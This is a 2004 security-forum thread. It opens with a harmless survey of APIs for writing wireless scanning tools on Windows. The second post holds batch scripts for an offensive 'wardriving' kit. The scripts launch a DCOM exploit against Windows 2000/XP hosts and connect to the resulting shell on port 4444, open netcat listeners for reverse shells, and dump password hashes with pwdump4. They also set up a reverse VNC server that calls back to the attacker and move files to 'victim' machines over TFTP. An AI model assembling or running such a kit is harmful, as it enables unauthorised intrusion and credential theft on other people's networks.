Wireless Apps In Windows

GovernmentSecurity.org > System Security > Wifi Security

IDEspinner

Oct 22 2004, 05:17 AM

Seeing the lack of posts in this forum makes me sad... so i will help fill it up

Coding Wireless applications in windows.

Alright, when you are trying to code your very own netstumbler there are a few choices out there for you to use. Making a netstumbler clone is honestly pretty simple.

1.: Use WRAPI.

QUOTE

WRAPI is a software library that allows applications running in user space on mobile end stations to query information about the IEEE 802.11 network they are attached to. WRAPI 1.0 is implemented on the Windows XP operating system and is a hardware-independent tool that works with any IEEE 802.11b wireless network hardware vendor.

you can get wrapi here
hxxp://ramp.ucsd.edu/pawn/wrapi/

If you use wrapi, you have the advantage that it is guaranteed to work regardless of any wireless card. the downside, you must use xp. WRAPI is a fairly straightforware to use library with a nice set of functions. You can easily make a netstumbler clone with this in any language of your choice(after you compile wrapi)

A major drawback to using wrapi is that you must have the windows ddk, not everybody has it, but it is free(minus shipping and handling?)
get it here:
hxxp://www.microsoft.com/whdc/devtools/ddk/orderddkcd.mspx

2: Use the WMI
When the shmoo group presented their presentation at toorcon, i was definatley intrigued because even though i knew all of it already, i never thought to use it. WMI has many functions that support alot of wireless applications. Your netstumbler clone in vbscript couldnt be easier. To see a quick example of the functions that are provided you can just go to
start -> run -> "wbemtest" -> click connect -> under namespace put "root\wmi"
click "enum classes" -> click recursive -> click ok

now here you see all the functions you are entitled to, specifically, scroll down to the
"MSNdis_80211_" fields, look at all those wireless functions... hmm i wonder what we could do with those

use your imagination.

If you want source i found this example: "Wireless Signal Strength"
hxxp://www.samurize.com/modules/ipboard/http://www.governmentsecurity.org/forum/index.php?showtopic=2505&st=0

3. use winpcap
just because its not specifically for wireless, and you cant grab management frames doesnt make it useless.

Airsnare is a good example of this:
hxxp://home.comcast.net/~jay.deboer/airsnare/

QUOTE

AirSnare is another tool to add to your Wireless Intrusion Detection Toolbox. AirSnare will alert you to unfriendly MAC addresses on your network and will also alert you to DHCP requests taking place. If AirSnare detects an unfriendly MAC address you have the option of tracking the MAC address's access to IP addresses and ports or by launching Ethereal upon a detection.

using winpcap found at
hxxp://winpcap.polito.it/
you can still code many useful utilities.

4. Driver/ndis programming
Yep, last resort, but is it really that difficult?
Probably, but ir you recall a recent post of mine regarding hostap for windows, you may recall a neat app called prisma. If you happen to own a prism 2 based card you can easily build off the source, since its included. Infact, if you have anything to add, im sure they could use your help.

QUOTE

26/06/2004

Help needed for WEP cracking on windows !
I wrote a quick and dirty sample program to control Prism2 based cards using the Winpcap protocol driver and the PacketRequest API. WEP cracking requires the capture of 802.11 frames; this program shows how to set those cards into HostAP and monitor mode and contains functions to get/set parameters of the Prism2 chipset. The FULL SOURCE CODE for Visual C++ is included, I hope that you can help me on some topics and problems I found. The code should compile without problems but to test the program you need a Prism2 based card and the Winpcap driver installed.
You can download Prisma here.

You can download Prisma here:
hxxp://www.oxid.it/downloads/Prisma_v1.0.zip

So wrapping it up, are you really limited on windows?

yes.

ok but atleast you have many options still available to you, go out and code me a great app using a combination of all these methods, its 100 percent possible!

midnightsavage

Nov 24 2004, 05:59 AM

Well this is my first post so I hope someone gets something out of it. I don't know a lot about hacking and only basic programming so no flames please. You have to configure you program locations in the other batch files and you have to configure you wireless network name for the change ip part. I wrote these bat files to give me a central interface when I was wardriving. Comments or improvements are appreciated.

In order to use you must have these programs.

aircrack.exe
airodump.exe
cain.exe
netstumbler.exe
nmap.exe
pwdump4.exe google
tftpd32.exe google
kaht2.exe google
nc.exe google
winfo.exe google
DcomExploit.exe google
installer.exe and client.exe from institution 2004 vnc package VNC

All the batch file name must be named the same unless you want to change the code.

This is wireless.bat

CODE

color 0a
rem I hardly consider myself a hacker of any sort. I put this together because i wanted

rem a central interface when I was wardriving. Windows batch programming is hardly

rem programming and I wish I could have wrote this in REAL code. I would advise
rem against trying to break into a company of any size.They have the technology to
rem catch you. HAVE FUN!

:start
title Welcome to the MATRIx:
@echo off
echo
echo
cls
echo +----------------------------------------------------+
echo = WIRLE$$ TE$T KIT =
echo = STRESSFRACTURE =
echo = stress_fracture@excite.com =
echo +----------------------------------------------------+

echo /) Local IP Configuration ') Dcom Exploit Connect
echo.
echo .) Net View ;) VNC Server Edit

echo ,) NMAP Scan L) Start TFTP Server
echo.
echo M) Trace Route K) VNC Client
echo.
echo N) Netcat Listener J) Air Dump
echo.
echo B) Hack Server H) Air Crack
echo.
echo V) ARP cache G) Cain
echo.
echo C) KAHT2 F) IP Renew
echo.
echo X) Dcom Exploit D) Command Prompt
echo.
echo.Q) Open Directory S) PWDUMP4
echo.
echo.A) Netstumbler \) Winfo
echo.
echo.]) Change IP Z) Exit
echo.

:choice
set /p c= $:
if "%C%"=="/" goto localip
if "%C%"=="." goto shares
if "%C%"=="," goto nmap
if "%C%"=="m" goto traceroute
if "%C%"=="n" goto netcat
if "%C%"=="b" goto server
if "%C%"=="v" goto arp
if "%C%"=="c" goto kaht2
if "%C%"=="x" goto dcomexploit
if "%C%"=="'" goto dcomconnect
if "%C%"==";" goto vncedit
if "%C%"=="l" goto tftp
if "%C%"=="k" goto vncclient
if "%C%"=="j" goto airdump
if "%C%"=="h" goto aircrack
if "%C%"=="g" goto cain
if "%C%"=="f" goto iprenew
if "%C%"=="q" goto opendir
if "%C%"=="d" goto command
if "%C%"=="s" goto pwdump
if "%C%"=="a" goto netstumbler
if "%C%"=="\" goto winfo
if "%C%"=="]" goto ipchange
if "%C%"=="z" goto :eof

if "%C%"=="/" goto localip
if "%C%"=="." goto shares
if "%C%"=="," goto nmap
if "%C%"=="M" goto traceroute
if "%C%"=="N" goto netcat
if "%C%"=="B" goto server
if "%C%"=="V" goto arp
if "%C%"=="C" goto kaht2
if "%C%"=="X" goto dcomexploit
if "%C%"=="'" goto dcomconnect
if "%C%"==";" goto vncedit
if "%C%"=="L" goto tftp
if "%C%"=="K" goto vncclient
if "%C%"=="J" goto airdump
if "%C%"=="H" goto aircrack
if "%C%"=="G" goto cain
if "%C%"=="F" goto iprenew
if "%C%"=="D" goto command
if "%C%"=="Q" goto opendir
if "%C%"=="S" goto pwdump
if "%C%"=="A" goto netstumbler
if "%C%"=="|" goto winfo
if "%C%"=="}" goto ipchange
if "%C%"=="Z" goto :eof

:localip
cls
@echo off
ipconfig
pause
goto :start
:shares
cls

@echo off
rem this doent usually work
net view
echo Enter Target:
set /p netviewtarget=
net view %netviewtarget%
pause
goto :start
:nmap
rem nmap has to be in the same directory as wireless.bat or you can change directory

with cd
cls
rem nmap settings can be changed, these are just what I like to use.
@echo off
set /p scantarget=Enter Target:
@echo Enter Scan Type:
@echo S -sS
@echo T -sT
@echo V -sV
@echo Must be Capitol
set /p scantype=

nmap -s%scantype% -P0 -T Insane -vv %scantarget%
pause

goto :start

:traceroute

@echo off
set /p tracetarget=Enter Target:
tracert %tracetarget%
pause
goto :start

:netcat
rem netcat must be in the same directory
@echo Enter port:
set /p port=
start "Netcat listening on port %port%" /MIN nc -v -t -l -p %port% -L
echo Netcat server started on port %port%
pause
goto :start

:server
rem ports used for reverse connect backs. Put whatever you want here.
start /MIN nc -t -v -l -p 80 -L
start /MIN nc -t -v -l -p 666 -L
start /MIN nc -t -v -l -p 8080 -L
start /MIN nc -t -v -l -p 9999 -L
start /MIN nc -t -v -l -p 22178 -L
start /MIN nc -t -v -l -p 31337 -L
echo Netcat listening on ports 80, 666, 8080, 9999, 22178, 31337...
pause
goto :start
:arp
arp -a
pause
goto :start

:kaht2
set /p ip1=First IP Address:
set /p ip2=Second IP Address:
start kaht2 %ip1% %ip2%
goto :start

:dcomexploit
echo 0 win32 2000 SP0
echo 1 win32 2000 SP1
echo 2 win32 2000 SP2
echo 3 win32 2000 SP3
echo 4 win32 2000 SP4
echo 5 win32 XP SP0
echo 6 win32 XP SP1
echo Shell on port 4444 if exploit succesful
set /p targetid=Enter Version:
set /p address=Enter IP:
echo Shell on port 4444 if exploit succesful
start dcomexploit %targetid% %address%

goto :start

:dcomconnect
rem this is for a computer exploited with dcomexploit above.
set /p target=Enter Target:
start nc %target% 4444
goto :start

:vncedit
start vncedit.bat
goto :start

:tftp
rem I always keep tftp32 in my program directory but you can change it to wherever its

at
rem in caes your wondering tftp is for transfering files ex "tftp -i server get filename"

or "tftp -i server put filename" usually takes a couple of tries on rem victim if you get

unexpected block errors

start /min tftpd32.exe
goto :start

:vncclient
start /min client.exe
goto :start

:airdump
start airodump.bat
goto :start

:aircrack
rem edit aircrack location in aircrack.bat
start aircrack.bat
goto :start

:cain
rem Cain can be found at http:\\www.oxid.it
rem Edit the location where cain is located in cain.bat
start cain.bat
goto :start

:iprenew
rem this renews your IP address on a DHCP enabled AP
start /min ipconfig /renew
goto :start

:opendir
start opendir.bat
goto :start

:command
start
goto :start

:pwdump
cls
echo off
set target=0
set share=0
set output=0
set username=0
set rename=0
set /p target=Enter Target IP:
set /p share=Enter Share:
set /p output=Enter Output File Name:
set /p username=Enter Username:
set /p rename=Rename Files on Victim to:
pwdump4 %target% /s:%share% /o:%output% /u:%username% /r:%newname%
pause
goto :start

:netstumbler
start netstumbler.bat
goto :start

:winfo
cls
set /p target=Enter Target:
set /p textfile=Enter text file Prefix:
set /p var=Use Null Session(y/n)
if "%var%"=="y" winfo %target% -n -v >> %textfile%.txt
if "%var%"=="n" winfo %target% -v >> %textfile%.txt
start %textfile%.txt
goto :start

:ipchange
start ipchange.bat
goto :start

This is airodump.bat

CODE

echo off
echo +----------------------------------------------------+
echo = WIRLESS TE$T KIT =
echo = Coded by STRESSFRACTURE =
echo = stress_fracture@excite.com =
echo +----------------------------------------------------+

cd\
cd documents and settings\travis\desktop\hacktools\hacktoolsx\cap
start airodump
exit

This is cain.bat

CODE

This is ipchange.bat

CODE

echo off
echo +----------------------------------------------------+
echo = WIRLESS TE$T KIT =
echo = Coded by STRESSFRACTURE =
echo = stress_fracture@excite.com =
echo +----------------------------------------------------+

echo off
rem You have to edit Orinoco for the name of your connection

set /p x=DHCP 1 STATIC 2 :
if "%x%"=="1" goto dhcp
if "%x%"=="2" goto static

:static
echo off
set /p ip=Enter new IP:
echo.
set /p sm=Enter Subnet Mask:
echo.
set /p gw=Enter Default Gateway:
netsh interface ip set dns "Orinoco" static %gw%
netsh interface ip set address "Orinoco" static %ip% %sm% %gw% 1

:dhcp
netsh interface ip set dns name="Orinoco" source=dhcp
netsh interface ip set address name="Orinoco" source=dhcp

pause

exit

This is netstumbler.bat

CODE

This is explorer.bat

CODE

echo off
echo +----------------------------------------------------+
echo = WIRLESS TE$T KIT =
echo = Coded by STRESSFRACTURE =
echo = stress_fracture@excite.com =
echo +----------------------------------------------------+
start explorer c:\documents and settings\travis\desktop\hacktools\hacktoolsx
exit

This is installer.bat

CODE

echo off
echo +----------------------------------------------------+
echo = WIRLESS TE$T KIT =
echo = Coded by STRESSFRACTURE =
echo = stress_fracture@excite.com =
echo +----------------------------------------------------+

echo off
cd\
cd documents and settings\travis\desktop\hacktools\hacktoolsx\tftp
rem This edits the Institution VNC reverse connect back vnc server
echo.
echo.
@echo Reverse VNC connect Listener Editor
echo.
echo.
set /p ip=Enter your IP:
set /p port=Enter Port Client Listening on:
installer.exe -e "dll32" %ip% %port%
exit

This is aircrack.bat

CODE

echo off
echo +----------------------------------------------------+
echo = WIRLESS TE$T KIT =
echo = Coded by STRESSFRACTURE =
echo = stress_fracture@excite.com =
echo +----------------------------------------------------+
cd\
cd documents and settings\travis\desktop\hacktools\hacktoolsx\cap
start aircrack
exit

I would post every thing you need here but alas I am limited by the restrictions on this forum

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.